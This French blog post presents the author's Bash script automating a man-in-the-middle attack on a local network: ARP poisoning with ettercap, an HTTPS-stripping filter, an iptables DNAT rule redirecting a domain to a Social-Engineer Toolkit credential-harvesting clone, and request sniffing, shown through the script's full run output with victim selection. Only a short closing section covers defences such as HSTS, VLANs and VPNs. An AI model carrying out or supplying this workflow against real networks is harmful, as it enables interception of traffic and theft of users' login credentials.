<!DOCTYPE html>
<html lang="en-us">

  <head>
  <link href="http://gmpg.org/xfn/11" rel="profile">
  <meta http-equiv="content-type" content="text/html; charset=utf-8">

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">

  <title>
    
      Phishing d'un site web avec attaque MITM &middot; Lanyon
    
  </title>

  
  <link rel="canonical" href="http://localhost:4000/mitm/2016/09/08/mitm-phishing/">
  

  <link rel="stylesheet" href="http://localhost:4000/public/css/poole.css">
  <link rel="stylesheet" href="http://localhost:4000/public/css/syntax.css">
  <link rel="stylesheet" href="http://localhost:4000/public/css/lanyon.css">
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=PT+Serif:400,400italic,700%7CPT+Sans:400">

  <link rel="apple-touch-icon-precomposed" sizes="144x144" href="http://localhost:4000/public/apple-touch-icon-precomposed.png">
  <link rel="shortcut icon" href="http://localhost:4000/public/favicon.ico">

  <link rel="alternate" type="application/rss+xml" title="RSS" href="http://localhost:4000/atom.xml">

  
</head>


  <body>

    <!-- Target for toggling the sidebar `.sidebar-checkbox` is for regular
     styles, `#sidebar-checkbox` for behavior. -->
<input type="checkbox" class="sidebar-checkbox" id="sidebar-checkbox" checked>

<!-- Toggleable sidebar -->
<div class="sidebar" id="sidebar">
  <div class="sidebar-item">
    <p>A reserved <a href="https://jekyllrb.com" target="_blank">Jekyll</a> theme that places the utmost gravity on content with a hidden drawer. Made by <a href="https://twitter.com/mdo" target="_blank">@mdo</a>.</p>
  </div>

  <nav class="sidebar-nav">
    <a class="sidebar-nav-item" href="http://localhost:4000/">Home</a>

    

    
    
      
        
      
    
      
        
      
    
      
        
          <a class="sidebar-nav-item" href="http://localhost:4000/about/">About</a>
        
      
    
      
    
      
    
      
        
      
    
      
        
      
    
      
        
      
    
      
        
      
    
      
        
      
    

    <a class="sidebar-nav-item" href="/archive/v1.1.0.zip">Download</a>
    <a class="sidebar-nav-item" href="">GitHub project</a>
    <span class="sidebar-nav-item">Currently v1.1.0</span>
  </nav>

  <div class="sidebar-item">
    <p>
      &copy; 2020. All rights reserved.
    </p>
  </div>
</div>


    <!-- Wrap is the content to shift when toggling the sidebar. We wrap the
         content to avoid any CSS collisions with our real content. -->
    <div class="wrap">
      <div class="masthead">
        <div class="container">
          <h3 class="masthead-title">
            <a href="/" title="Home">Lanyon</a>
            <small>A Jekyll theme</small>
          </h3>
        </div>
      </div>

      <div class="container content">
        <div class="post">
  <h1 class="post-title">Phishing d'un site web avec attaque MITM</h1>
  <span class="post-date">08 Sep 2016</span>
  <p><br />
Bonjour à tous,</p>

<p>Je me suis dit qu’il était intéressant de partager avec vous un petit script <strong>Bash</strong> que j’ai créé pour automatiser une attaque ‘Man In The Middle’ et rediriger vers une fausse page web que nous allons héberger (<a href="https://github.com/phackt/mitm">https://github.com/phackt/mitm</a>). L’objectif est pour une attaque ciblée de rendre l’obtention des credentials la plus transparente possible. Cependant il n’existe pas de solution miracle, à chaque combat sa stratégie.</p>

<p>Ici nous allons donc cibler un site possédant une page d’accueil non sécurisée (HTTP), permettant l’interception en clair des liens HTTPS et de les transformer en liens HTTP classiques. Certains outils comme <a href="https://github.com/moxie0/sslstrip">sslstrip</a> permettent ce genre d’opérations, en éliminant le caching des pages et en traitant également les headers response <strong>Location</strong> lors des redirections. De notre coté nous utiliserons un simple filtre <a href="https://github.com/Ettercap/ettercap">ettercap</a> que nous compilerons avec etterfilter.</p>

<p>Pour petit rappel:</p>

<blockquote>
  <p>L’attaque de l’homme du milieu ou man-in-the-middle attack (MITM) est une attaque qui a pour but d’intercepter les communications entre deux parties, sans que ni l’une ni l’autre ne puisse se douter que le canal de communication entre elles a été compromis.</p>
</blockquote>

<p><img src="http://localhost:4000/public/images/mitm-phishing/owasp-man_in_the_middle.jpg" alt="Mitm" /><br />
Cette attaque se base sur la corruption du cache ARP enregistrant les correspondances @IP &lt;-&gt; @MAC sur un réseau local. Il existe plusieurs outils pour effectuer une <a href="https://www.information-security.fr/attaque-man-in-the-middle-via-arp-spoofing/">attaque MITM</a> et nous utiliserons Ettercap.</p>

<p>Le site web a été falsifié grâce à l’outil <a href="https://github.com/trustedsec/social-engineer-toolkit">setoolkit</a> (Social-Engineer Toolkit). Concernant la redirection du domaine, j’ai simplement effectué une règle iptables PREROUTING DNAT au lieu d’effectuer un DNS SPOOFING qui aurait demandé que le cache DNS soit vidé.</p>

<p>Mais venons-en au cas pratique, voici l’exécution du script <strong>phishing.ksh</strong>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-----------------------------------------------
   --==MITM attack with website phishing==--   
-----------------------------------------------

[+] Flushing ip forwarding
[+] Flushing iptables

#HERE SET THE NAME OF THE LOG DIR THAT WILL BE CREATED
Name of 'Session'? (name of the folder that will be created with all the log files): test

#CHOOSE YOUR INTERFACE UP
[+] Discovering interfaces
lo:     state  UNKNOWN
eth0:   state  DOWN
wlan0:  state  UP
Please enter your interface: wlan0

#IF YOU WANNA CHANGE YOUR MAC ADDRESS (http://www.macvendors.com/)
Do you wanna spoof MAC @ ? [yYnN]: n

#TYPE THE DOMAIN THAT WILL BE REDIRECTED TO YOUR WEBSITE
Which domain do you wish to redirect ?: secure.domain.fr

#ASSUMING 192.168.1.99 IS THE MITM MACHINE LOCAL IP WITH APACHE RUNNING
[+] Setting up DNAT iptables rule
iptables -t nat -A PREROUTING -p tcp --dport 80 -d secure.domain.fr -j DNAT --to-destination 192.168.1.99:8080

#IF YOU WANNA RUN SETOOLKIT ( choose options 1) Social-Engineering -&gt; 2) Website Attack Vectors -&gt; 3) Credential Harvester Attack Method )
[+] Setting up website phishing
Do you wanna run setoolkit ? [yYnN]: n

[+] Starting apache2 service

#RUN NETDISCOVER IN ORDER TO ARPING THE SUBNET
[+] Net discovering
Do you wanna netdiscovering ? [yYnN]: y
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.1     01:12:23:34:45:56      1      42  Gateway
 192.168.1.100   12:23:34:45:56:67      2      84  Apple Macbook Pro

-- Active scan completed, 1 Hosts found.


[+] Routing information
Table de routage IP du noyau
Destination     Passerelle      Genmask         Indic Metric Ref    Use Iface
0.0.0.0         192.168.1.1     0.0.0.0         UG    600    0        0 wlan0
192.168.1.0     0.0.0.0         255.255.255.0   U     600    0        0 wlan0

#CHOOSE THE VICTIM
Enter target1 ip: 192.168.1.11
#CHOOSE THE SECOND MACHINE (DEFAULT IS GATEWAY)
Enter target2 ip [press enter for default gateway 192.168.1.1]: 

#LAUNCHING ETTERCAP WITH THE HTTPS STRIP ETTERCAP FILTER (https_strip.ef)
[+] Running MITM attack...

#IF YOU NEED TO LEGITIMATE AN ARP REPLY (IF GATEWAY IS A PRETENTIOUS YOUNG MADAM)
/!\ Please check poisoning is OK by typing 'P', then 'chk_poison'
Command for protected gateway: 
dhcping -c 192.168.1.100 -h 12:23:34:45:56:67 -s 192.168.1.1 -r -v

#SNIFFING HTTP REQUESTS
[+] Starting GET/POST logging...
urlsnarf: listening on wlan0 [tcp port 80 or port 8080 or port 3128]

#TAILING PHISHING WEBSITE HARVESTER FILE
[+] Looking for credentials...

[+] IMPORTANT...
After the job please close this script and clean up properly by hitting 'qQ'
</code></pre></div></div>

<p>Les outils MITM peuvent également forger dynamiquement un certificat pour interception des connexions TLS/SSL. Cependant ce dernier n’étant pas signé par une autorité de certification vérifiée, un warning dans votre navigateur affichera que le certificat est non valide (assez discret sous Safari cependant).</p>

<p><img src="http://localhost:4000/public/images/mitm-phishing/alerte-certificat.png" alt="Certificat" /></p>

<blockquote>
  <p><span style="color: red">Cliquez sur ‘Back to safety’</span></p>
</blockquote>

<p>Dans notre exemple, la connexion au site falsifié est non sécurisée (évitant les alertes de certificats). Donc vérifier toujours le cadenas vert dans la barre d’url et que votre connexion soit sécurisée.</p>

<p>Dans le cas d’une autorité de certification compromise le pinning de clé publique pourrait avoir son utilité même si le HPKP devient obsolète et ne sera plus supporté sous Chrome au bénéfice du ‘Certificate Transparency’. Nous voyons aussi l’importance du HSTS (Strict-Transport-Security) abordé dans les <a href="http://localhost:4000/xss-cors-csrf-partie-3-cors-csrf#hsts">précédents articles</a> pour forcer les connexions HTTPS. Certains firewall (ex <a href="https://www.symantec.com/security_response/glossary/define.jsp?letter=a&amp;word=anti-mac-spoofing">Symantec</a>) empêchent les ARP Reply non légitimes.</p>

<p>L’autre solution la plus couramment utilisée reste le cloisonnement en VLAN. Si vous vous connectez à un HotSpot, établir un canal chiffré (ex VPN) est également une idée.</p>

<p>A bientôt.
<br />
<br />
Références :<br />
<a href="https://www.owasp.org/index.php/Man-in-the-middle_attack">https://www.owasp.org/index.php/Man-in-the-middle_attack</a><br />
<a href="https://www.owasp.org/index.php/Man-in-the-middle_attack">https://www.information-security.fr/attaque-man-in-the-middle-via-arp-spoofing/</a></p>

</div>


<div class="related">
  <h2>Related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/dev/2020/05/27/git-secrets-exposed/">
            What solutions to prevent git leaks ?
            <small>27 May 2020</small>
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/web/2018/08/05/web-exposed-git-repositories/">
            Gathering some information from web exposed git repositories
            <small>05 Aug 2018</small>
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/web/2017/12/24/play-with-permissive-cors/">
            Play with permissive CORS
            <small>24 Dec 2017</small>
          </a>
        </h3>
      </li>
    
  </ul>
</div>


      </div>
    </div>


    <!-- <label for="sidebar-checkbox" class="sidebar-toggle"></label> -->

    <script src='/public/js/script.js'></script>
 
  </body>
</html>
